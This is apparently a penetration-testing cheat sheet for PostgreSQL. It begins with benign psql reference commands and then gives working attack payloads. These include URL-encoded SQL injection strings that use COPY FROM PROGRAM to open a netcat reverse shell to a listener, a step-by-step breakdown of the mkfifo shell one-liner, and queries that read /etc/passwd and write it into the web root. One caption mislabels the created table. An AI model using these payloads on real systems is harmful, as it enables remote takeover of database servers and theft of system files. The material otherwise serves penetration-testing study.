CheatSheet

Useful PostgreSQL Commands

Quick reference for common PostgreSQL tasks and checks.

PostgreSQL

List Databases

\l

Connect to Database

\c [database_name]

List Tables

\dt

Describe Table

\d [table_name]

List Schemas

\dn

List Users

\du

Version Check

SELECT version();

Identify Current User

SELECT current_user;

List Functions

\df

List Extensions

\dx

Executing a Reverse Shell via SQLi

Create a Table

'+%3b+CREATE+TABLE+shell(output+text)--
  • This creates a table called read_files with one column and the data type of text:
read_files

  | output |
  | --- |
  | (empty row for text) |

Start Local Listener

rlwrap nc -nvlp 1234

Execute Shell Command

'%3b+COPY+shell+FROM+PROGRAM+'rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.45.212+1234+>/tmp/f'--
  • The COPY FROM PROGRAM command in PostgreSQL runs a shell command on the database server and reads its output into the table.

PostgreSQL evaluates COPY shell FROM PROGRAM '...':

  • This is a privileged command that tells PostgreSQL to run an external shell command on the database server (not on your client machine).
  • It expects the command to return some output via stdout, which it will read and insert into the shell table.

Reverse Shell Explanation

This is a classic reverse shell using a named pipe (/tmp/f) and Netcat (nc).

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Command breakdown:

Command Part Explanation
rm /tmp/f Removes any existing file or named pipe at /tmp/f to prevent errors during creation.
mkfifo /tmp/f Creates a named pipe (FIFO) at /tmp/f. This pipe is used to pass input to the shell.
cat /tmp/f Reads from the named pipe — this will become input to the shell (sh).
/bin/sh -i Launches an interactive shell, allowing real-time command execution.
2>&1 Redirects stderr (file descriptor 2) to stdout (1) so errors are captured with output.
| nc 10.0.0.1 1234 Sends the shell output to a Netcat listener at 10.0.0.1:1234.
> /tmp/f Takes incoming data from the Netcat connection and writes it into the named pipe, creating a bidirectional loop.

Execution flow:

  1. Your commands (typed on nc) are written into /tmp/f.
  2. cat /tmp/f feeds input to /bin/sh -i, which executes it.
  3. Shell output (stdout + stderr) returns to your listener at 10.0.0.1:1234.
  4. You now have interactive shell access to the PostgreSQL server.

Copying Tables into Other Files

Basic Output

COPY (SELECT pg_read_file('/etc/passwd')) TO '/var/www/html/passwd';
  • This will simply read the contents of one file and store them in the second.

Creating Table and Storing File in Table

CREATE TABLE read_files(output text);
  • This creates a table called read_files with one column and the data type of text:
read_files

  | output |
  | --- |
  | (empty row for text) |
COPY read_files FROM ('/etc/passwd');
  • This essentially copies the output from /etc/passwd into the empty row.
SELECT * FROM read_files;